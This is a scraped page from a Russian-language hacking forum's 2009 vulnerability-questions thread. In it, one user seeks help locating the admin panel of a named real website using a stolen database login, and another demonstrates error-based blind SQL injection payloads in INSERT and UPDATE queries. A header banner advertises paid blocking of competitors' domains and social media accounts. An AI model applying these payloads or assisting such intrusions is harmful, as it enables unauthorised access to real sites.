УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 839 из 1393

839

Опции темы

Поиск в этой теме

Опции просмотра

#8381

02.08.2009, 00:24

crawen_s

Новичок

Регистрация: 19.07.2009

Сообщений: 17

Провел на форуме:
134119

Репутация: 2

Цитата:

http://www.washingtoninstitute.org/

Помогите админку найти.. искал IntelliTamper, не помогло(

Пасс и логин в базе есть.

#8382

02.08.2009, 00:55

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от [Raz0r]

Скорее всего данные отправляются постом, поэтому проверь, что отправляется %00, а не %2500. Отправляй данные напрямую или используя плагины для FF типа TamperData.

Да слал скриптом на php через сокеты - и \x00 и %00 - ощибка та же.

#8383

02.08.2009, 10:55

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

Провел на форуме:
3300342

Репутация: 165

Вот решил обратиться за советом

Вот такой код

PHP код:


		
			
$id=((int)abs($_GET['id']));

    $sql=mysql_query('SELECT * FROM `site` where `id`=\''.$id.'\' LIMIT 1;'))>=1)

Полность не уязвим от SQL inj?

#8384

02.08.2009, 11:14

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

да

#8385

02.08.2009, 11:22

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

зачем фильтрация? какая фильтрацция..? (int) - твоя фильтрация...

http://forum.antichat.ru/thread30641.html

#8386

02.08.2009, 19:26

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

Провел на форуме:
861008

Репутация: 58

игрался с консолью мускула)
может и было где то но я узнал что при иньекции в инсерте можно сделать блинд и выполнять запросы))хочу проверить прав или нет?)
имеем таблица users

Цитата:

mysql> select * from users;
+-------+-------------------+
| U_ID | U_PASSWORD |
+-------+-------------------+
| admin | thankyou444 |
+-------+-------------------+

теперь представим регистрацию на сайте) естественно будет больше колонок но не суть важно)
смысл: INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ($_GET['id'],$_GET['pass']);
допустим

Цитата:

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1','2');
Query OK, 1 row affected (0.00 sec)

как и должно быть

мы же можем изменять параметры id и pass

Цитата:

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(1=1,1,(select 1 union select 2)));
Query OK, 1 row affected (0.02 sec)

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(1=2,1,(select 1 unio
n select 2)));
ERROR 1242 (21000): Subquery returns more than 1 row

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(substring(version(),
1,1)=4,1,(select 1 union select 2)));
ERROR 1242 (21000): Subquery returns more than 1 row

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(substring(version(),
1,1)=5,1,(select 1 union select 2)));
Query OK, 1 row affected (0.00 sec)

но как я понимаю должно быть так INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('$_POST['id']','$_POST['pass']');
тогда получится так
mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1','if(substring(version()
,1,1)=5,1,(select 1 union select 2))');
и

Цитата:

mysql> select * from users;
+-------+------------------------------------------------------------+
| U_ID | U_PASSWORD |
+-------+------------------------------------------------------------+
| joker | thankyou444 |
| 1 | if(substring(version(),1,1)=5,1,(select 1 union select 2)) |
+-------+------------------------------------------------------------

выход (наверна):
$_GET['id']=1',if(1=1,1,2)/* получится запрос
INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(1=1,1,2)/*','')
и он выполнится)
естественно все прокатит при определенных фазах луны, выключенных магик_квотес и т.д.)
прав я или нет?)

#8387

02.08.2009, 19:29

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Да ты ЕвГЕНИЙ!!!

https://forum.antichat.ru/threadnav35207-1-10.html

Инфа от 11.03.2007

#8388

02.08.2009, 23:10

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

Провел на форуме:
861008

Репутация: 58

2jokester
знаю я эту статью)
но там нет объединиения insert и "Subquery returns more than 1 row"

упомянув о срыве запроса ошибкой он не сказал что можно это провести и с другими запросами. не только селект как написано в статье)

думаю это дополнение ))))

и еще вопрос)

Цитата:

mysql> update `users` set U_ID='l' where U_ID=if(1=1,'iii',(select 1 union sele
t 2));
Query OK, 0 rows affected (0.09 sec)
Rows matched: 0 Changed: 0 Warnings: 0

mysql> update `users` set U_ID='l' where U_ID=if(1=2,'iii',(select 1 union sele
t 2));
Query OK, 0 rows affected, 1 warning (0.03 sec)
Rows matched: 0 Changed: 0 Warnings: 0

в последнем запросе говорит про варнинг но не ерор)
неужели нельзя провести провокацию на ошибку?)

#8389

02.08.2009, 23:28

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

j0ker13

Специально для тебя:

п 2 (большие жирные зелёные буковки):
[2] INSERT и другие
п 4 (те-же самые буковки)
[4] Альтернатива benchmark'y

И вот тут уже твои примеры, только в качестве оператора, для примера взят select. Но это без разницы, оператор любой может быть, в том числе и update

Цитата:

Сообщение от j0ker13

упомянув о срыве запроса ошибкой он не сказал что можно это провести и с другими запросами. не только селект как написано в статье)

Цитата:

Сообщение от Elekt

Разумеется, вместо INSERT может стоять любой другой оператор, в том числе и SELECT, ведь с ним тоже бывают cложные случаи инъекций.

Просто прочти её

#8390

03.08.2009, 11:50

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

Провел на форуме:
861008

Репутация: 58

ладна не будем засорять топ) удали сообщения)
пусть читают нормальные статьи))

Страница 839 из 1393

839

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход